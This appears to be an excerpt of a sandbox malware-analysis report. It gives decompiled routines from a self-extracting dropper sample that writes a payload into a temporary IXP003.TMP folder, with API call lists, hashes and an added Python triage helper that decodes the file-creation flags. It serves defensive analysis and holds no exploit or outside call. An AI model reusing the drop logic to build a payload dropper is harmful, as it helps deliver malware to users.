                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t37;  // misnamed by the decompiler: this is the BOOL result
                                                                                                                                                                                                                                    				void* _t39;                // file handle
                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 =  *0x198004; // 0x21bd9a3c   (/GS security cookie read from the data section)
                                                                                                                                                                                                                                    				_v8 = _t15 ^ _t40;                // cookie XOR frame pointer, verified in the epilogue
                                                                                                                                                                                                                                    				_v272 = _v272 & 0x00000000;       // bytes written = 0
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_v276 = _a16;
                                                                                                                                                                                                                                    				_t37 = 1;                         // assume success
                                                                                                                                                                                                                                    				// Copy the extraction directory into the MAX_PATH buffer, then append the file name.
                                                                                                                                                                                                                                    				// IXPnnn.TMP under %TEMP% is the directory naming used by IExpress/wextract self-extracting packages.
                                                                                                                                                                                                                                    				// The literal carries the sandbox user "hardz"; the API list below renders the same path with "user".
                                                                                                                                                                                                                                    				E00191781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                    				E0019658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                                                    				// CreateFileA(path, GENERIC_WRITE = 0x40000000, no sharing, no security attributes,
                                                                                                                                                                                                                                    				//             CREATE_ALWAYS = 2, FILE_ATTRIBUTE_NORMAL = 0x80, no template handle)
                                                                                                                                                                                                                                    				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                    				if(_t39 != 0xffffffff) {          // INVALID_HANDLE_VALUE
                                                                                                                                                                                                                                    					_t28 = _a4;
                                                                                                                                                                                                                                    					// Write the payload; a failed or short write counts as an error
                                                                                                                                                                                                                                    					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                    						 *0x199124 = 0x80070052;  // HRESULT_FROM_WIN32(ERROR_CANNOT_MAKE), stored in a global (likely a last-error slot)
                                                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					CloseHandle(_t39);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					 *0x199124 = 0x80070052;  // same error when the file cannot be created
                                                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				// Epilogue: stack-cookie check (E00196CE0), then return _t37 (1 = written, 0 = failed)
                                                                                                                                                                                                                                    				return E00196CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    Instruction addresses of the C-code above (one per source line): 0x001963cb to 0x00196492

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 001963EB
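
Added triage helper for the API list above. This is example code written for this page; it is not part of the Joe Sandbox report, the IDA plugin, or the analysed sample. It reads constructed copies of the three API lines, decodes the raw CreateFileA arguments into their Win32 names, decodes the 0x80070052 HRESULT the routine stores on failure, and flags the GENERIC_WRITE/CREATE_ALWAYS drop into an IXPnnn.TMP directory. The regular expression for the report's line format and the IXP path pattern are assumptions about the report's output, not documented behaviour.

```python
"""Decode the CreateFileA/WriteFile drop shown in the report's API list.

Added example for this page; not part of the Joe Sandbox report or of the
sample. The line format and the path pattern are assumptions about the report.
"""
import re

# Constructed copies of the three API lines the report lists for E001963C0.
REPORT_API_LINES = [
    r"• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019642D",
    r"• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019645B",
    r"• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019647A",
]

# Assumed shape of a report API line: "• Name.MODULE(arg,arg,...), ref: ADDRESS".
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*?)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# IExpress/wextract extraction directories are named IXP<nnn>.TMP under %TEMP%.
IXP_TEMP = re.compile(r"\\Temp\\IXP\d{3}\.TMP\\", re.IGNORECASE)

# Win32 constants (winnt.h / fileapi.h / winerror.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
              0x4: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL",
              0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
WIN32_ERRORS = {2: "ERROR_FILE_NOT_FOUND", 3: "ERROR_PATH_NOT_FOUND",
                5: "ERROR_ACCESS_DENIED", 82: "ERROR_CANNOT_MAKE"}


def parse_api_line(line):
    """Split one report API line into name, module, raw argument strings and call site."""
    m = API_LINE.match(line)
    if not m:
        raise ValueError(f"not a report API line: {line!r}")
    return {
        "name": m.group("name"),
        "module": m.group("module"),
        "args": [a.strip() for a in m.group("args").split(",")],
        "ref": int(m.group("ref"), 16),
    }


def _int_arg(arg):
    """Arguments are hex words; '?' means the sandbox could not resolve the value."""
    return None if arg == "?" else int(arg, 16)


def decode_flags(value, table):
    """Expand a bitmask into symbolic names; leftover bits are kept as hex."""
    if value is None:
        return ["?"]
    names = [name for bit, name in table.items() if value & bit]
    known = sum(bit for bit in table if value & bit)
    rest = value & ~known
    if rest:
        names.append(f"0x{rest:08x}")
    return names


def decode_create_file(call):
    """Name the seven CreateFileA parameters; later slots are stack residue the sandbox also prints."""
    if call["name"] != "CreateFileA":
        raise ValueError("expected a CreateFileA call")
    a = call["args"]
    disposition = _int_arg(a[4])
    return {
        "path": a[0],
        "access": decode_flags(_int_arg(a[1]), GENERIC_ACCESS),
        "share": decode_flags(_int_arg(a[2]), SHARE_MODE),
        "disposition": "?" if disposition is None else CREATION.get(disposition, f"0x{disposition:x}"),
        "attributes": decode_flags(_int_arg(a[5]), FILE_ATTRS),
        "stack_residue": a[7:],
    }


def decode_hresult(hr):
    """Split an HRESULT; facility 7 (FACILITY_WIN32) wraps a plain Win32 error code."""
    facility = (hr >> 16) & 0x1FFF
    code = hr & 0xFFFF
    return {
        "severity": "FAILURE" if hr & 0x80000000 else "SUCCESS",
        "facility": "FACILITY_WIN32" if facility == 7 else f"facility_{facility}",
        "code": code,
        "name": WIN32_ERRORS.get(code, "unknown") if facility == 7 else "unknown",
    }


def triage(lines):
    """Flag a writable CREATE_ALWAYS handle under an IXPnnn.TMP directory followed by WriteFile,
    the sequence a self-extractor uses to drop its embedded payload."""
    calls = [parse_api_line(line) for line in lines]
    findings = []
    for call in calls:
        if call["name"] != "CreateFileA":
            continue
        cf = decode_create_file(call)
        # The path buffer itself is on the stack ("?"), so look for the IXP directory in any slot.
        in_ixp = any(IXP_TEMP.search(arg) for arg in call["args"])
        if "GENERIC_WRITE" in cf["access"] and cf["disposition"] == "CREATE_ALWAYS" and in_ixp:
            findings.append(f"CreateFileA at 0x{call['ref']:08X}: GENERIC_WRITE/CREATE_ALWAYS under an IXPnnn.TMP directory")
    if findings and any(c["name"] == "WriteFile" for c in calls):
        findings.append("WriteFile follows: payload bytes written to the new file")
    return findings


if __name__ == "__main__":
    for finding in triage(REPORT_API_LINES):
        print(finding)
    print(decode_hresult(0x80070052))
```

Run as a script it prints the two findings and the decoded HRESULT; triage() returns the findings so the same check can be applied to the API list of any other routine in the report by pasting its lines into REPORT_API_LINES.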
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-256195474
                                                                                                                                                                                                                                    • Opcode ID: f4cf87940e3ebafd92554b87e416e2b8774ab75349360e09723748bddbdbd657
                                                                                                                                                                                                                                    • Instruction ID: 215df7ea05c569bf96a1465d7abfc66090fa77c19f3a7f9525171f2ddf02a02b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cf87940e3ebafd92554b87e416e2b8774ab75349360e09723748bddbdbd657
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21D571A00218ABDB10DF65DC85FEB7378EB59314F0041AAF585A3180DBB06DC58FB5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001947E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                                                    						E00191680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                    						_t11 =  *0x1991e0; // 0x2818f08
                                                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                    						 *0x1991e0 = _t34;
                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t25 =  *0x198584; // 0x0
                                                                                                                                                                                                                                    					E001944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 =  *0x198584; // 0x0
                                                                                                                                                                                                                                    				E001944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00194E6F), ref: 001947EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00194823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00194847
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00194851
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 359063898-256195474
                                                                                                                                                                                                                                    • Opcode ID: 51bfb9b1f86c1ccad3f45b98c5550c662e9d30e75cfb8437a675d00cbfd79f1d
                                                                                                                                                                                                                                    • Instruction ID: 3a418f6f011a02b2b96f898401bee8bbdb84f16e05d78ddfac50cb40aba13a09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bfb9b1f86c1ccad3f45b98c5550c662e9d30e75cfb8437a675d00cbfd79f1d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE1125B56046416FEF288F649C18F763B5AEB86310B04852AFA828B741DB359C4B8660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 77%
E00196517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
	struct HRSRC__* _t6;
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x199a3c; // 0x190000
	_t6 = FindResourceA(_t23, __edx, 5);
	if(_t6 == 0) {
		L6:
		E001944B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t24 = _a16;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) {
				goto L6;
			}
		}
	}
	return _t24;
}


APIs
• FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
• LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
• DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
• FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: f3441d2d2c32ae1d54b44c3bcd17f10b52fc4a6cbe05f08cc99cce76630e7fbc
• Instruction ID: dbae37cf576cf8f8033666b28711f34bc5f64d4304d1294135bf192f61e525f0
• Opcode Fuzzy Hash: f3441d2d2c32ae1d54b44c3bcd17f10b52fc4a6cbe05f08cc99cce76630e7fbc
• Instruction Fuzzy Hash: 00014972100605BBEF105F69AC08DBB7A6CEF857A0F06012AFE0093150D771CC50C6F1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00193680(void* __ecx) {
	void* _v8;
	struct tagMSG _v36;
	int _t8;
	struct HWND__* _t16;

	_v8 = __ecx;
	_t16 = 0;
	while(1) {
		_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
		if(_t8 == 0) {
			break;
		}
		if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
			continue;
		} else {
			do {
				if(_v36.message != 0x12) {
					DispatchMessageA( &_v36);
				} else {
					_t16 = 1;
				}
				_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
			} while (_t8 != 0);
			if(_t16 == 0) {
				continue;
			}
		}
		break;
	}
	return _t8;
}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0019369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 001936CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 88712dba3f33d6f456741b48fe1a43deae495a5cdb4d65bf7666ab326de093a8
                                                                                                                                                                                                                                    • Instruction ID: 3d176b49f8537123045881edb4632937d1e20d985c2acfb9c79907c6dc24197d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88712dba3f33d6f456741b48fe1a43deae495a5cdb4d65bf7666ab326de093a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C01677290025577DF304BA65C4CEEB767CEBC5B10F14012AF925E2184D661CB84C6B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			/* Decompiled by the Joe Sandbox IDA plugin. Editor's reading (an inference, not stated by the
                                                                                                                                                                                                                                    			   report): the routine walks an ANSI path backwards from its end and truncates it at the last
                                                                                                                                                                                                                                    			   backslash, keeping that backslash when it is a root ("C:\" or a lone leading "\"); it returns 1
                                                                                                                                                                                                                                    			   when something was cut off. This is the usual PathRemoveFileSpec-style helper. */
                                                                                                                                                                                                                                    			E001965E8(char* __ecx) {
                                                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                                                    				_t15 = __ecx;                      /* start of the buffer */
                                                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                    				_t10 = 0;                          /* doubles as the NUL written below and the "removed" flag */
                                                                                                                                                                                                                                    				do {                               /* inline strlen: advance to the terminating NUL */
                                                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));   /* cursor = last character of the string */
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);    /* "??": the decompiler could not name the argument; it is the most recently pushed cursor */
                                                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                                                    						break;                      /* reached the first byte of the buffer */
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if( *_t16 == 0x5c) {           /* 0x5c is '\\' */
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {   /* 0x3a is ':' -> drive root, keep the '\\' */
                                                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t16 = _t10;              /* _t10 is still 0 here: NUL-terminate at the cut */
                                                                                                                                                                                                                                    						_t10 = 1;                   /* report that the path was shortened */
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(_t16);                /* not a separator: step back one character */
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if( *_t16 == 0x5c) {               /* cursor sits on the first byte: a lone leading '\\' */
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00192B33), ref: 00196602
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00196612
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00196629
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00196635
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                                                    • Opcode ID: 85c4325ff605ebcf8e3ebb744e5d874c0766e7193e2dbe951f0429b3d7de2cbc
                                                                                                                                                                                                                                    • Instruction ID: 1b2f10dc36591ad57d26012705872fc139c9c14a7f0b41cdfda455dc5038ae23
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85c4325ff605ebcf8e3ebb744e5d874c0766e7193e2dbe951f0429b3d7de2cbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F028320041506EEF321B298C88DBBBF9CDF87364B2A01BFE59582401D7150D4A86B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
// Decompiled by the sandbox: MSVC C-runtime initialisation stub (no return type recovered)
E001969B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	*0x1981f8 = E00196C70();
	__set_app_type(E00196FBE(2));       // E00196FBE resolves the module handle (GetModuleHandleW, see APIs)
	*0x1988a4 = *0x1988a4 | 0xffffffff; // CRT globals initialised to -1
	*0x1988a8 = *0x1988a8 | 0xffffffff;
	_t4 = __p__fmode();                 // default file translation mode
	_t11 = *0x198528; // 0x0
	*_t4 = _t11;
	_t5 = __p__commode();               // default file commit mode
	_t12 = *0x19851c; // 0x0
	*_t5 = _t12;
	_t6 = E00197000();
	if( *0x198000 == 0) {
		__setusermatherr(E00197000);    // install the application's math error handler
	}
	E001971EF(_t6);
	return 0;
}


APIs
  • Part of subcall function 00196FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00196FC5
• __set_app_type.MSVCRT ref: 001969C2
• __p__fmode.MSVCRT ref: 001969D8
• __p__commode.MSVCRT ref: 001969E6
• __setusermatherr.MSVCRT ref: 00196A07
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 6300f0afedfeefbf152cdbd476823687cc3dc72d940d4f9bfd35073cdaa893f0
• Instruction ID: ac546e27124c6d4ceb5f486de7146ead2585a12044a75ab3de05bcaebaaa79ff
• Opcode Fuzzy Hash: 6300f0afedfeefbf152cdbd476823687cc3dc72d940d4f9bfd35073cdaa893f0
• Instruction Fuzzy Hash: 88F0A5705183018FDB59AF34EE4A6087BA1FF16331B95061BF46286AF1CF3A95D9CB21
Uniqueness

Uniqueness Score: -1.00%
Callgraph


Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.300567939.00007FFBACED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbaced0000_bus9402.jbxd
Similarity
• API ID: ChangeConfigService
• String ID:
• API String ID: 3849694230-0
• Opcode ID: c95da83ad16d07d7414b115e1b40eae2c5d42bba4691ae8fe63d3367b28dd64d
• Instruction ID: 8aaaae0aae91af442c1d3a56d7ea74af29a0d4bd9727492a9e175be73befba0a
• Opcode Fuzzy Hash: c95da83ad16d07d7414b115e1b40eae2c5d42bba4691ae8fe63d3367b28dd64d
